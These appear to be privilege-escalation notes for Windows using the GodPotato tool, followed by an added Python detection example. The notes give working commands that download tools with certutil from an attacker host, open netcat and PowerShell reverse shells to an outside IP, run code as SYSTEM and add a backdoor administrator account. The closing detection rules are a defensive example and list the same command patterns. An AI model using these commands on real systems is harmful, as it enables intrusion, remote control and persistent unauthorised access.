Check the .NET Framework version

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

Transfer GodPotato from the attacker's Kali machine to the target host

certutil -urlcache -split -f http://<attacker-ip>/GodPotato.exe gp.exe

Basic test

.\gp.exe -cmd "whoami"

.\gp.exe -cmd "cmd.exe /c whoami /all > C:\Users\merlin\Desktop\god.txt"

type C:\Users\merlin\Desktop\god.txt

Reverse shell - nc.exe

# nc.exe transfer
certutil -urlcache -split -f http://<attacker-IP>/nc64.exe nc.exe

# test
.\nc.exe <attacker-IP> 80 -e C:\Windows\system32\cmd.exe

# GodPotato
.\gp.exe -cmd ".\nc.exe <attacker-IP> 80 -e C:\Windows\System32\cmd.exe"

Reverse shell 2

# Attacker
rlwrap nc -lvnp 4444

# Target
.\GodPotato.exe -cmd "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444"

Create an admin user

GodPotato.exe -cmd "net user wook P@ssw0rd! /add"
GodPotato.exe -cmd "net localgroup administrators wook /add"
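
Detection view of the steps above, as an added example that is not part of the original notes: Python logic that flags the command lines these steps produce in process-creation telemetry, plus the SYSTEM child spawned by a non-SYSTEM parent that results when GodPotato runs a command. The event fields (user, parent_user, cmd), the rule names and the sample events are assumptions constructed for illustration.

```python
import re

# Command-line patterns for the steps in these notes (rule names are this example's own).
RULES = {
    "certutil_download": re.compile(r"\bcertutil(\.exe)?\s.*[-/]urlcache\b.*https?://", re.I),
    "netcat_exec_shell": re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+\S*\b(cmd|powershell)\.exe", re.I),
    "ps_download_cradle": re.compile(r"\bpowershell(\.exe)?\b.*\bIEX\b.*DownloadString\(", re.I),
    "local_user_add": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I),
    "local_admin_add": re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
}
SYSTEM = "NT AUTHORITY\\SYSTEM"

def detect(event):
    """Return the sorted list of rule names an event triggers."""
    hits = {name for name, rx in RULES.items() if rx.search(event["cmd"])}
    # A SYSTEM child spawned by a non-SYSTEM parent is the token-impersonation signal.
    if event["user"].upper() == SYSTEM and event["parent_user"].upper() != SYSTEM:
        hits.add("system_child_of_non_system_parent")
    return sorted(hits)

# Constructed sample events (not real telemetry); host and account names are placeholders.
SAMPLE_EVENTS = [
    {"user": "HOST\\svc_web", "parent_user": "HOST\\svc_web",
     "cmd": "certutil -urlcache -split -f http://192.0.2.10/tool.exe gp.exe"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent_user": "HOST\\svc_web",
     "cmd": "cmd.exe /c whoami /all"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent_user": "HOST\\svc_web",
     "cmd": "net user example_user Example-Pass1 /add"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent_user": "HOST\\svc_web",
     "cmd": "net localgroup administrators example_user /add"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent_user": "NT AUTHORITY\\SYSTEM",
     "cmd": "net user"},  # benign enumeration by a SYSTEM service: no hit expected
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(detect(ev), "<-", ev["cmd"])
```

The parent/child account mismatch fires regardless of what the tool is renamed to, so it is the more durable of the signals; the command-line rules add context for triage.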